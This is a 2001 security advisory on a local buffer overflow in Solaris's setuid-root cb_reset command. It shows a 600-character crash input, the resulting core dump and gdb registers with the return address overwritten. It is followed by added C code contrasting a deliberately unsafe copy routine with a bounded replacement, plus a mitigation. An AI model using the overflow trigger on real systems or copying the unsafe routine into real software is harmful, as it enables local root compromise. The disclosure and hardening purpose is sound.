From: Pablo Sor (psor@afip.gov.ar)
Date: Wed Jun 20 2001 - 11:30:59 CDT


    Vulnerability in Solaris /opt/SUNWssp/bin/cb_reset

    Date Published: June 12, 2001

    Advisory ID: N/A

    Bugtraq ID: N/A

    CVE CAN: None currently assigned.

    Title: Solaris /opt/SUNWssp/bin/cb_reset Buffer Overflow Vulnerability

    Class: Boundary Error Condition

    Remotely Exploitable: No

    Locally Exploitable: Yes

    Vulnerability Description:

    A problem with the cb_reset setuid root command included in the SUNWssp package
    (not in the standard install) results in a buffer overflow and potentially
    the execution of arbitrary code.
    Due to insufficient handling of the input parameter, a buffer overflow at 600
    characters makes it possible to overwrite variables on the stack, including
    the return address.

    Vulnerable Packages/Systems:

    SunOS 5.8 (not tested on other versions)

    Solution/Vendor Information/Workaround:

    Sun Microsystems was notified on June 12, 2001. Patches are expected shortly.

    Credits:

    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.

    This advisory was drafted with the help of the SecurityFocus.com Vulnerability
    Help Team. For more information or assistance drafting advisories please mail
    vulnhelp@securityfocus.com.

    Technical Description :

    $ uname -a
    SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10

    $ ls /tftpboot/cb_port
    /tftpboot/cb_port

    $ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
    Resetting host
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
    ether_hostton(SrcHost:laika): No such file or directory
    ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAA): No such file or directory
    Bus Error (core dumped)

    $ gdb /opt/SUNWssp/bin/cb_reset --core=core
    Copyright 2000 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "sparc-sun-solaris2.8"...
    (no debugging symbols found)...
    Core was generated by `/opt/SUNWssp/bin/cb_reset
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 10, Bus Error.
    Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
    (no debugging symbols found)...done.
    Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
    Reading symbols from /opt/SUNWssp/lib/liblogger.so...
    (no debugging symbols found)...done.

    [...]

    Loaded symbols for /usr/lib/nss_files.so.1
    #0 0x1219c in cb_send_frame ()
    (gdb) info registers
    g0 0x0 0
    g1 0xff195b80 -15115392
    g2 0xff322630 -13490640
    g3 0xff332d78 -13423240
    g4 0x0 0
    g5 0x0 0
    g6 0x0 0
    g7 0x0 0
    o0 0x13278 78456
    o1 0xff1bbab8 -14959944
    o2 0xff1b8018 -14974952
    o3 0x13278 78456
    o4 0x13258 78424
    o5 0xffbedb71 -4269199
    sp 0xffbedb18 -4269288
    o7 0x1218c 74124
    l0 0xc3c3c3c3 -1010580541
    l1 0x41414141 1094795585
    l2 0x41414141 1094795585
    l3 0x41414141 1094795585
    l4 0x41414141 1094795585
    l5 0x41414141 1094795585
    l6 0x41414141 1094795585
    l7 0x41414141 1094795585
    i0 0x41414141 1094795585
    i1 0x41414141 1094795585
    i2 0x41414141 1094795585
    i3 0x41414141 1094795585
    i4 0x4141414d 1094795597
    i5 0x41414141 1094795585
    fp 0x41414141 1094795585
    i7 0x41414141 1094795585 (***)
    y 0xb 11
    psr 0xfe801001 -25161727
    wim 0x0 0
    tbr 0x0 0
    pc 0x1219c 74140
    npc 0x121a0 74144
    fpsr 0x0 0
    cpsr 0x0 0
    (gdb)

    -- 
    Pablo Sor
    psor@afip.gov.ar, psor@ccc.uba.ar
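The register dump above (every saved local and input register, including %i7, the saved return address, reads 0x41414141) is the signature of an argv string copied into a fixed-size stack buffer with no length check. The following is an added example, not code from the advisory and not Sun's cb_reset source (which is not on this page): it models that bug class with an assumed 256-byte buffer and an assumed "DstHost:" prefix, puts the bounded version a setuid program should use beside it, and rebuilds the advisory's `perl -e 'print "A"x600'` probe in C so the hardened routine can be checked against it.

```c
/* Added example: the unbounded-copy pattern behind a stack overflow like the
 * one in the cb_reset advisory, next to a bounded, validating replacement.
 * LINEBUF, MAX_HOST and the "DstHost:" prefix are assumptions for
 * illustration, not values taken from cb_reset. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define LINEBUF 256   /* assumed size of the fixed stack buffer */
#define MAX_HOST 255  /* RFC 1035 upper bound on a host name */

/* Vulnerable shape (assumed, shown for contrast only): argv[1] is appended to
 * a fixed stack buffer with no length check. An argument longer than
 * LINEBUF - sizeof("DstHost:") bytes runs past line[] into the saved register
 * window and return address, which is exactly what the gdb register dump
 * shows. Never call this with an untrusted argument. */
void format_target_unsafe(char *dst, const char *host)
{
    char line[LINEBUF];
    strcpy(line, "DstHost:");
    strcat(line, host);   /* <-- the overflow */
    strcpy(dst, line);
}

/* Hardened version: bounded length scan, a whitelist of host-name characters,
 * and snprintf with its return value checked for truncation.
 * Returns 1 and fills dst on success; returns 0 and leaves dst empty when the
 * argument is rejected. */
int format_target_safe(char *dst, size_t dstsz, const char *host)
{
    if (dstsz == 0) return 0;
    dst[0] = '\0';
    if (host == NULL) return 0;

    /* Scan at most MAX_HOST + 1 bytes so an oversize argument cannot make us
     * walk a 600-byte (or longer) string looking for its terminator. */
    size_t n = 0;
    while (n <= MAX_HOST && host[n] != '\0') {
        unsigned char c = (unsigned char)host[n];
        if (!isalnum(c) && c != '.' && c != '-') return 0;
        n++;
    }
    if (n == 0 || n > MAX_HOST) return 0;

    int w = snprintf(dst, dstsz, "DstHost:%s", host);
    if (w < 0 || (size_t)w >= dstsz) {   /* output would have been truncated */
        dst[0] = '\0';
        return 0;
    }
    return 1;
}

/* C equivalent of perl -e 'print "A"x600': a heap string of n copies of c.
 * Caller frees. */
char *repeat_char(char c, size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL) return NULL;
    memset(s, c, n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char out[LINEBUF];
    char *probe = repeat_char('A', 600);   /* the advisory's test input */
    if (probe == NULL) return 1;

    printf("laika -> %s\n",
           format_target_safe(out, sizeof out, "laika") ? out : "rejected");
    printf("600xA -> %s\n",
           format_target_safe(out, sizeof out, probe) ? out : "rejected");
    /* format_target_unsafe(out, probe) would smash line[] just as cb_reset did. */
    free(probe);
    return 0;
}
```

The three checks in format_target_safe are independent on purpose: the length bound stops the scan early, the character whitelist rejects anything that is not a host name before it reaches a formatting call, and the snprintf return-value test catches the case where the buffer passed in is smaller than the caller assumed. For a setuid root binary like cb_reset, the operational mitigation while a vendor patch is pending is to remove the setuid bit (chmod u-s) where the program's function is not needed by unprivileged users.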